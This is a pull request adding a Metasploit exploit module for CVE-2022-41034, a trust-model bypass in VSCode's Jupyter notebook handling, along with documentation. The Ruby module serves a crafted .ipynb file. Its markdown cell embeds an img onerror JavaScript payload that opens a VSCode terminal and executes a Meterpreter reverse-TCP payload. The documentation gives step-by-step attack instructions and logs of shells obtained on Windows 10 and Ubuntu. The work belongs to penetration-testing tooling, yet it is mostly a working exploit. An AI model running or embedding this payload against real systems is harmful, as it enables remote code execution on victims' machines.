### PR TITLE
VSCode exploit for ipynb integration (CVE-2022-41034)

### DIFF
--- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
+++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
@@ -37,7 +37,7 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
 1. Start msfconsole
 1. Do: `use linux/x64/meterpreter/reverse_tcp`
 1. Do: `set lhost [ip]` and `set lport [port]`
-1. Do: `geneate -o shell.sh -f elf`
+1. Do: `generate -o shell.sh -f elf`
 1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
 1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
 1. Do: `set target 1 `
@@ -45,8 +45,8 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
 1. Do: `set FETCH_WRITABLE_DIR /tmp/`
 1. Do: `set PAYLOAD_FILENAME shell.sh`
 1. Do: `run`
-1. Copy the ipynd payload file to the target machine.
-1. In VSCode, open the URL (File -> Open -> project.ipynb)
+1. Copy the ipynb, and payload file to the target machine.
+1. In VSCode, open the file (File -> Open -> project.ipynb)
 1. After the pop-up errors, open the file again.
 1. You should get a shell.
 

--- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
+++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
@@ -1,13 +1,13 @@
 ## Vulnerable Application
 
-VSCode when opening an Jypiter notebook (.ipynb) file bypasses the trust model.
-On versions v1.4.0 - v1.71.1, its possible for the Jypiter notebook to embed
+VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.
+On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed
 HTML and javascript, which can then open new terminal windows within VSCode.
 Each of these new windows can then execute arbitrary code at startup.
 
-During testing, the first open of the Jypiter notebook resulted in pop-ups
+During testing, the first open of the Jupyter notebook resulted in pop-ups
 displaying errors of unable to find the payload exe file. The second attempt
-at opening the Jypiter notebook would result in successful exeuction.
+at opening the Jupyter notebook would result in successful exeuction.
 
 Successfully tested against VSCode 1.70.2 on Windows 10.
 

--- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
+++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+
+VSCode when opening an Jypiter notebook (.ipynb) file bypasses the trust model.
+On versions v1.4.0 - v1.71.1, its possible for the Jypiter notebook to embed
+HTML and javascript, which can then open new terminal windows within VSCode.
+Each of these new windows can then execute arbitrary code at startup.
+
+During testing, the first open of the Jypiter notebook resulted in pop-ups
+displaying errors of unable to find the payload exe file. The second attempt
+at opening the Jypiter notebook would result in successful exeuction.
+
+Successfully tested against VSCode 1.70.2 on Windows 10.
+
+### Install
+
+From https://code.visualstudio.com/updates/v1_70
+
+https://update.code.visualstudio.com/1.70.2/win32-x64-user/stable
+
+https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. In VSCode, open the URL (File -> Open -> Paste/type the URL)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### VSCode 1.70.2 on Windows 10
+
+```
+resource (ipynb)> use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+resource (ipynb)> set fetch_srvport 9090
+fetch_srvport => 9090
+resource (ipynb)> rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[*] Starting up web service...
+[*] Using URL: http://192.168.10.147:8080/project.ipynb
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+
+
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sent project.ipynb to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Sending stage (201798 bytes) to 192.168.10.100
+[*] Meterpreter session 1 opened (192.168.10.147:4444 -> 192.168.10.100:56964) at 2024-03-21 12:38:13 +0000
+[*] Meterpreter session 2 opened (192.168.10.147:4444 -> 192.168.10.100:56967) at 2024-03-21 12:38:14 +0000
+^C[-] Exploit failed [user-interrupt]: Interrupt 
+[*] Server stopped.
+[-] rexploit: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-Q0HUOEI
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter > shell
+Process 9632 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4170]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Users\h00die>code --version
+code --version
+1.70.2
+e4503b30fc78200f846c62cf8091b76ff5547662
+x64
+
+C:\Users\h00die>
+```

--- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
+++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md
@@ -7,9 +7,9 @@ Each of these new windows can then execute arbitrary code at startup.
 
 During testing, the first open of the Jupyter notebook resulted in pop-ups
 displaying errors of unable to find the payload exe file. The second attempt
-at opening the Jupyter notebook would result in successful exeuction.
+at opening the Jupyter notebook would result in successful execution.
 
-Successfully tested against VSCode 1.70.2 on Windows 10.
+Successfully tested against VSCode 1.70.2 on Windows 10 and Ubuntu 22.04.
 
 ### Install
 
@@ -22,12 +22,31 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
 
 ## Verification Steps
 
+### Windows
 1. Install the application
 1. Start msfconsole
 1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
 1. Do: `set lhost [ip]`
 1. Do: `run`
 1. In VSCode, open the URL (File -> Open -> Paste/type the URL)
+1. After the pop-up errors, open the file again.
+1. You should get a shell.
+
+### Linux
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/x64/meterpreter/reverse_tcp`
+1. Do: `set lhost [ip]` and `set lport [port]`
+1. Do: `geneate -o shell.sh -f elf`
+1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
+1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
+1. Do: `set target 1 `
+1. Do: `set lhost [ip]` and `set lport [port]` - be sure to set these to the same values as in the previous step
+1. Do: `set FETCH_WRITABLE_DIR /tmp/`
+1. Do: `set PAYLOAD_FILENAME shell.sh`
+1. Do: `run`
+1. Copy the ipynd payload file to the target machine.
+1. In VSCode, open the URL (File -> Open -> project.ipynb)
 1. After the pop-up errors, open the file again.
 1. You should get a shell.
 
@@ -88,4 +107,42 @@ e4503b30fc78200f846c62cf8091b76ff5547662
 x64
 
 C:\Users\h00die>
+```
+
+### VSCode 1.70.2 on Linux
+
+```
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Starting up web service...
+[*] Using URL: http://172.16.199.1:8090/project.ipynb
+[*] Sent project.ipynb to 172.16.199.131
+[*] Sending stage (3045380 bytes) to 172.16.199.131
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:60298) at 2024-05-13 09:56:36 -0700
+
+^C[-] Exploit failed [user-interrupt]: Interrupt
+[*] Server stopped.
+[-] run: Interrupted
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information               Connection
+  --  ----  ----                   -----------               ----------
+  3         meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:60298 (172.16.199
+
+msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: msfuser
+meterpreter > sysinfo
+Computer     : 172.16.199.131
+OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -50,6 +50,15 @@ class MetasploitModule < Msf::Exploit::Remote
               }
 
             }
+          ],
+          [
+            'Linux File-Dropper',
+            {
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
           ]
         ],
         'DefaultTarget' => 0,
@@ -66,6 +75,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'SideEffects' => [SCREEN_EFFECTS]
         }
       )
+    )
+    register_options(
+      [
+        OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),
+        OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),
+      ]
     )
   end
 
@@ -87,9 +102,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if target['Platform'] == 'win'
       config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
-      # else
-      # leaving incase anyone wants to try to tackle linux at some point
-      # config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
+    else
+      config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }
     end
 
     pload = JSON.dump({ 'config' => config })

--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -1,0 +1,122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VSCode ipynb Remote Development RCE',
+        'Description' => %q{
+          VSCode when opening an Jypiter notebook (.ipynb) file bypasses the trust model.
+          On versions v1.4.0 - v1.71.1, its possible for the Jypiter notebook to embed
+          HTML and javascript, which can then open new terminal windows within VSCode.
+          Each of these new windows can then execute arbitrary code at startup.
+
+          During testing, the first open of the Jypiter notebook resulted in pop-ups
+          displaying errors of unable to find the payload exe file. The second attempt
+          at opening the Jypiter notebook would result in successful exeuction.
+
+          Successfully tested against VSCode 1.70.2 on Windows 10.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # metasploit module
+          'Zemnmez'
+        ],
+        'References' => [
+          ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],
+          ['CVE', '2022-41034'],
+          ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']
+        ],
+        'DisclosureDate' => '2023-10-27', # XXX
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'Stance' => Stance::Aggressive, # XXX debugging
+        'Payload' => { 'BadChars' => '&"' },
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              }
+
+            }
+          ],
+          [
+            'nix',
+            {
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
+              }
+
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 3_600, # 1hr
+          'URIPATH' => 'project.ipynb'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          # on windows it will say the final payload can't be found
+          # however, it is, seems to be a timing issue, 2nd exploit attempt
+          # works perfectly
+          'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+  end
+
+  def check
+    CheckCode::Unsupported
+  end
+
+  def exploit
+    unless datastore['URIPATH'].end_with? '.ipynb'
+      fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')
+    end
+    print_status('Starting up web service...')
+    start_service
+    sleep(datastore['WFSDELAY'])
+  end
+
+  def on_request_uri(cli, request)
+    super unless request.uri.end_with? datastore['URIPATH']
+
+    pload = %({"config":{"executable":"#{payload.encoded.split(' ')[0]}","args":"#{payload.encoded.split(' ')[1..].join(' ')}"}})
+    puts pload
+    pload = CGI.escape(pload).gsub('+', '%20')
+
+    ipynb = %|{
+"cells": [
+  {
+  "cell_type": "markdown",
+  "metadata": {},
+  "source": [
+    "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"
+  ]
+  }
+]}|
+
+    send_response(cli, ipynb, {
+      'Connection' => 'close',
+      'Pragma' => 'no-cache',
+      'Access-Control-Allow-Origin' => '*'
+    })
+
+    print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")
+  end
+
+end

--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -95,9 +95,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     super unless request.uri.end_with? datastore['URIPATH']
 
-    pload = %({"config":{"executable":"#{payload.encoded.split(' ')[0]}","args":"#{payload.encoded.split(' ')[1..].join(' ')}"}})
+    if target['Platform'] == 'win'
+      config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
+    else
+      config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
+    end
+
+    pload = JSON.dump({ 'config' => config })
+
     puts pload
-    pload = CGI.escape(pload).gsub('+', '%20')
+    pload = CGI.escape(pload).gsub('+', '%20') # XXX not suure if this is needed or not
 
     ipynb = %|{
 "cells": [

--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -14,14 +14,14 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'VSCode ipynb Remote Development RCE',
         'Description' => %q{
-          VSCode when opening an Jypiter notebook (.ipynb) file bypasses the trust model.
-          On versions v1.4.0 - v1.71.1, its possible for the Jypiter notebook to embed
+          VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.
+          On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed
           HTML and javascript, which can then open new terminal windows within VSCode.
           Each of these new windows can then execute arbitrary code at startup.
 
-          During testing, the first open of the Jypiter notebook resulted in pop-ups
+          During testing, the first open of the Jupyter notebook resulted in pop-ups
           displaying errors of unable to find the payload exe file. The second attempt
-          at opening the Jypiter notebook would result in successful exeuction.
+          at opening the Jupyter notebook would result in successful exeuction.
 
           Successfully tested against VSCode 1.70.2 on Windows 10.
         },
@@ -35,10 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2022-41034'],
           ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']
         ],
-        'DisclosureDate' => '2023-10-27', # XXX
+        'DisclosureDate' => '2022-11-22',
         'Privileged' => false,
         'Arch' => ARCH_CMD,
-        'Stance' => Stance::Aggressive, # XXX debugging
+        'Stance' => Stance::Aggressive,
         'Payload' => { 'BadChars' => '&"' },
         'Targets' => [
           [
@@ -47,16 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'win',
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
-              }
-
-            }
-          ],
-          [
-            'nix',
-            {
-              'Platform' => 'linux',
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
               }
 
             }
@@ -97,14 +87,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if target['Platform'] == 'win'
       config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
-    else
-      config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
+      # else
+      # leaving incase anyone wants to try to tackle linux at some point
+      # config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
     end
 
     pload = JSON.dump({ 'config' => config })
-
-    puts pload
-    pload = CGI.escape(pload).gsub('+', '%20') # XXX not suure if this is needed or not
+    pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works
 
     ipynb = %|{
 "cells": [


### PR DESCRIPTION
(I swear its Jupyter, not Jypiter but its spelled this way 5 times in https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m)

 VSCode when opening an Jypiter notebook (.ipynb) file bypasses the trust model.
On versions v1.4.0 - v1.71.1, its possible for the Jypiter notebook to embed
HTML and javascript, which can then open new terminal windows within VSCode.
Each of these new windows can then execute arbitrary code at startup.

During testing, the first open of the Jypiter notebook resulted in pop-ups
displaying errors of unable to find the payload exe file. The second attempt
at opening the Jypiter notebook would result in successful exeuction.

Successfully tested against VSCode 1.70.2 on Windows 10.

## Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
- [ ] Do: `set lhost [ip]`
- [ ] Do: `run`
- [ ] In VSCode, open the URL (File -> Open -> Paste/type the URL)
- [ ] After the pop-up errors, open the file again.
- [ ] You should get a shell.
